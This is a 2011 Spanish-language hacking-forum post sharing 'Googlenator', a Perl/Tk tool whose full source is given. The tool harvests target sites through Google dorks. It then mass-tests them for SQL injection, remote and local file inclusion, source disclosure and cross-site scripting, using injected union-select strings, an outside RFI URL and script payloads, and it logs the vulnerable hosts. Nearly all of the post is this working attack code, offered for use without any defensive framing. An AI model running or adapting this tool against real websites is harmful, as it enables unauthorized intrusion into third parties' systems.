Imprimir Página - [Perl Tk] Googlenator

Título: [Perl Tk] Googlenator
Publicado por: BigBear en Agosto 19, 2011, 11:27:52 PM
Bueno esta es la nueva version de googlenator en la cual le corregi algunas cosas y le agregue un scanner para XSS

Una imagen seria

(http://doddyhackman.webcindario.com/images/newgoogle.gif)

El codigo es el siguiente
Código (perl) [Seleccionar]

#!usr/bin/perl
#Googlenator (C) Doddy Hackman 2011

use Tk;
use Tk::ROText;
use Tk::FileSelect;
use URI::Split qw(uri_split);
use Cwd;
use LWP::UserAgent;
use HTML::Form;


my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

installer();

my $new = MainWindow->new(-background=>"black");

$new->title("Googlenator (C) Doddy Hackman 2011");
$new->geometry("780x530");
$new->resizable(0,0);

$d = $new->Frame(-relief=>"sunken",-bd=>1,-background=>"black",-foreground=>"white");
my $scanx = $d->Menubutton(-text=>"Scan",-underline=>1,-background=>"black",-foreground=>"white",-activebackground=>"white")->pack(-side=>"left");
my $logsx = $d->Menubutton(-text=>"Logs",-underline=>1,-background=>"black",-foreground=>"white",-activebackground=>"white")->pack(-side=>"left");
$d->pack(-side=>"top",-fill=>"x");

$scanx->command(-label=>"SQL",-background=>"black",-foreground=>"white",-command=>\&loadsql);
$scanx->command(-label=>"RFI",-background=>"black",-foreground=>"white",-command=>\&loadrfi);
$scanx->command(-label=>"LFI",-background=>"black",-foreground=>"white",-command=>\&loadlfi);
$scanx->command(-label=>"FSD",-background=>"black",-foreground=>"white",-command=>\&loadfsd);
$scanx->command(-label=>"XSS",-background=>"black",-foreground=>"white",-command=>\&loadxss);

$logsx->command(-label=>"GoogleSearchs",-background=>"black",-foreground=>"white",-command=>\&loadgoogle);
$logsx->command(-label=>"SQL",-background=>"black",-foreground=>"white",-command=>\&loadfilesql);
$logsx->command(-label=>"RFI",-background=>"black",-foreground=>"white",-command=>\&loadfilerfi);
$logsx->command(-label=>"LFI",-background=>"black",-foreground=>"white",-command=>\&loadfilelfi);
$logsx->command(-label=>"FSD",-background=>"black",-foreground=>"white",-command=>\&loadfilefsd);
$logsx->command(-label=>"XSS",-background=>"black",-foreground=>"white",-command=>\&loadfilexss);


my $box = $new->ROText(-background=>"black",-foreground=>"white",-width=> 104,-height=> 20)->place(-x =>20,-y=>60);

head();

$new->Label(-background=>"black",-foreground=>"white",-text=>"Google : ",-font=>"Impact")->place(-y=>"380",-x=>"20");

my $google = $new->Entry(-background=>"black",-foreground=>"white",-width=>"30",-text=>"www.google.com.ar")->place(-x=>"80",-y=>"385");

$new->Label(-background=>"black",-foreground=>"white",-text=>"Pages : ",-font=>"Impact")->place(-y=>"380",-x=>"300");

my $pages = $new->Entry(-background=>"black",-foreground=>"white",-width=>"5",-text=>"30")->place(-y=>"385",-x=>"354");

$new->Label(-background=>"black",-foreground=>"white",-font=>"Impact",-text=>"Dorks : ")->place(-y=>"380",-x=>"450");

my $dorks = $new->Entry(-background=>"black",-foreground=>"white",-width=>"40",-text=>"index.php+id")->place(-y=>"385",-x=>"505");

$new->Button(-text=>"Search in Google",-background=>"black",-foreground=>"white",-activebackground=>"white",-width=>"130",-command=>\&googler)->place(-y=>"450");
$new->Button(-text=>"About",-background=>"black",-foreground=>"white",-activebackground=>"white",-width=>"130",-command=>\&about)->place(-y=>"474");
$new->Button(-text=>"Exit",-background=>"black",-foreground=>"white",-activebackground=>"white",-width=>"130",-command=>\&exitx)->place(-y=>"498");
	
MainLoop;

head();

sub googler {

my $google = $google->get;
my $pages = $pages->get;
my $dorks = $dorks->get;

head();

$box->insert("end","\t\t[+] Searching pages with string $dorks\n\n");

my @webas = google($google,$dorks,$pages);

$box->insert("end","\t\t[+] Cleaning\n\n");
$box->insert("end","\t\t[+] Webs Found ".int(@webas)."\n\n");

for(@webas) {
$new->update();
$box->insert("end","\t\t[Link] : ".$_."\n");
savefile($dorks.".txt",$_);
}

$box->insert("end","\n\t\t[+] All save in logs/search/".$dorks."\n");
$box->insert("end","\n\n\t\t[+] Finished\n\n");
	
}

sub loadsql {
 
$browse = $new->FileSelect(-directory => getcwd());
my $filea = $browse->Show;

head();


unless (-f $filea) {
$box->insert("end","\n\t\t[-] File Not Found\n");
next;
}

$box->insert("end","\n\t\t\[+] Scan SQL Started\n\n");
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
print $page."\n";
$new->update();
scansql($page);
}

sub scansql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
$box->insert("end","\t\t[+] SQLI : $page\n");
savefilevul("sql-logs.txt",$page);
}}
$box->insert("end","\n\n\t\t[+] Finished\n\n");
}


sub loadxss {
 
$browse = $new->FileSelect(-directory => getcwd());
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;

$box->insert("end","\n\t\t\[+] Scan XSS Started\n\n");
$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
$new->update();
scanxss($page);
}
$box->insert("end","\n\n\t\t[+] Finished\n\n");
}


sub loadrfi {
 
$browse = $new->FileSelect(-directory => getcwd());
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;


$box->insert("end","\n\t\t\[+] Scan RFI Started\n\n");
$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanrfi($page);
}

sub scanrfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
$box->insert("end","\t\t[+] RFI : $page\n");
savefilevul("rfi-logs.txt",$page);
}}
$box->insert("end","\n\n\t\t[+] Finished\n\n");
}

sub loadlfi {
 
$browse = $new->FileSelect(-directory => getcwd());
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;


$box->insert("end","\n\t\t\[+] Scan LFI Started\n\n");
$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanlfi($page);
}


sub scanlfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
$box->insert("end","\t\t[+] LFI : $page\n");
savefilevul("lfi-logs.txt",$page);
}}
$box->insert("end","\n\n\t\t[+] Finished\n\n");
}

sub loadfsd {
 
$browse = $new->FileSelect(-directory => getcwd());
my $filea = $browse->Show;

head();
$box->insert("end","\t\t[+] File : $filea\n");

open (FILE,$filea);
@words = <FILE>;
close FILE;

chomp @words;


$box->insert("end","\n\t\t\[+] Scan FSD Started\n\n");
$box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

for my $page(@words) {
my $page = clean($page);
$new->update();
scanfsd($page);
}

sub scanfsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) { 
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
$box->insert("end","\t\t[+] Full Source Discloure : $page\n");
savefilevul("fsd-logs.txt",$page);
}}}
$box->insert("end","\n\n\t\t[+] Finished\n\n");
}

sub head {

$box->delete("0.0","end");

$box->insert("end","
           @@@@     @@@      @@@      @@@@   @@   @@@@ @@   @@    @@   @@@@@@  @@@    @@@@  
          @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@@  @@    @@     @@   @@@@@   @@ @@ 
         @@@      @@   @@  @@   @@  @@@      @@   @@   @@@@ @@   @@@@    @@  @@   @@  @@ @@ 
         @@  @@@  @@   @@  @@   @@  @@  @@@  @@   @@@@ @@ @ @@   @  @    @@  @@   @@  @@@@  
         @@@  @@  @@   @@  @@   @@  @@@  @@  @@   @@   @@ @@@@  @@@@@@   @@  @@   @@  @@@@  
          @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@  @@@  @@  @@   @@   @@@@@   @@ @@ 
           @@@      @@@      @@@      @@@    @@@@ @@@@ @@   @@  @@  @@   @@    @@@    @@  @@

                                                                   
                                                                         Coded By Doddy H


	
");
}

sub about {
$about = MainWindow->new(-background=>"black");
$about->title("Googlenator v0.3");
$about->geometry("300x110");
$about->resizable(0,0);
$about->Label(-background=>"black",-foreground=>"white")->pack();
$about->Label(-text=>"Contact : lepuke[at]hotmail[com]",-font=>"Impact",-background=>"black",-foreground=>"white")->pack();
$about->Label(-text=>"Web : doddyhackman.webcindario.com",-font=>"Impact",-background=>"black",-foreground=>"white")->pack();
$about->Label(-text=>"Blog : doddy-hackman.blogspot.com",-font=>"Impact",-background=>"black",-foreground=>"white")->pack();
}

sub exitx {
exit(1);
}

sub savefilevul {
open (SAVE,">>logs/vulz/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub toma {
return $nave->get($_[0])->content;
}

sub dame_link {
return $nave->find_all_links();
}

sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}

sub savefile {
open (SAVE,">>logs/search/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}

sub google {

for ($pages=10;$pages<=$_[2];$pages=$pages+10) {
$new->update();
toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
@links = dame_link();
for my $l(@links) {
if ($l->url() =~/webcache.googleusercontent.com/) {
push(@url,$l->url());
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(@founds);

return @founds; 
}



sub installer {

unless (-d "logs/") {
mkdir("logs/","777");
mkdir("logs/search","777");
mkdir("logs/vulz","777");
}
}

sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}

sub loadgoogle {
system("start ".getcwd()."/logs/search/");
}

sub loadfilesql {
system("start logs/vulz/sql-logs.txt");
}


sub loadfilelfi {
system("start logs/vulz/lfi-logs.txt");
}


sub loadfilerfi {
system("start logs/vulz/rfi-logs.txt");
}


sub loadfilefsd {
system("start logs/vulz/fsd-logs.txt");
}


sub loadfilexss {
system("start logs/vulz/xss-logs.txt");
}

sub scanxss { 

my $page = shift;

my @testar = HTML::Form->parse(toma($page),"/");
my @botones_names;
my @botones_values;
my @orden;
my @pa = ("<script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>",'"><script>alert(String.fromCharCode(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111))</script>');
my @get_founds;
my @post_founds;
my @ordenuno;
my @ordendos;

my $contador_forms = 0;

my $valor = "doddyhackman";

for my $test(@testar) {
$contador_forms++;
if ($test->method eq "POST") {
my @inputs = $test->inputs;
for my $in(@inputs) {
if ($in->type eq "submit") { 
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
push(@ordenuno,$in->name,$pa[0]);
push(@ordendos,$in->name,$pa[1]);
}}

for my $n(0..int(@botones_names)-1) {
my @preuno = @ordenuno;
my @predos = @ordendos;
push(@preuno,$botones_names[$n],$botones_values[$n]);
push(@predos,$botones_names[$n],$botones_values[$n]);

my $codeuno = $nave->post($page,\@preuno)->content;
my $codedos = $nave->post($page,\@predos)->content;
if ($codeuno=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig or 
$codedos=~/<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig) {
if ($test->attr(name) eq "" or $test->attr(name) eq " ") {
push(@post_founds,$contador_forms);
} else {
push(@post_founds,$test->attr(name));
}}}
} else { #Fin de metodo POST
my @inputs = $test->inputs;
for my $in(@inputs) {	
if ($in->type eq "submit") { 
if ($in->name eq "") {
push(@botones_names,"submit");
}
push(@botones_names,$in->name);
push(@botones_values,$in->value);
} else {
$orden.=''.$in->name.'='.$valor.'&';
}}
chop($orden);
for my $n(0..int(@botones_names)-1) {
my $partedos = "&".$botones_names[$n]."=".$botones_values[$n];
my $final = $orden.$partedos;
for my $strin(@pa) {
chomp $strin;
$final=~s/doddyhackman/$strin/;
$code = toma($page."?".$final);
my $strin = "\Q$strin\E";
if ($code=~/$strin/) {
push(@get_founds,$page."?".$final);
}}}}} 

my @get_founds = repes(@get_founds);
if (int(@get_founds) ne 0) {
for(@get_founds) {
$box->insert("end","\t\t[+] XSS Found : $_\n");
savefilevul("xss-logs.txt","[+] XSS Found : $_");
}}

my @post_founds = repes(@post_founds);
if (int(@post_founds) ne 0) {
for my $t(@post_founds) {
if ($t =~/^\d+$/) {
$box->insert("end","\t\t[+] XSS : Form $t in $page\n");
savefilevul("xss-logs.txt","[+] XSS : Form $t in $page");
}}}} 


#  The End ?
Underc0de

Programación Scripting => Perl => Mensaje iniciado por: BigBear en Agosto 19, 2011, 11:27:52 PM
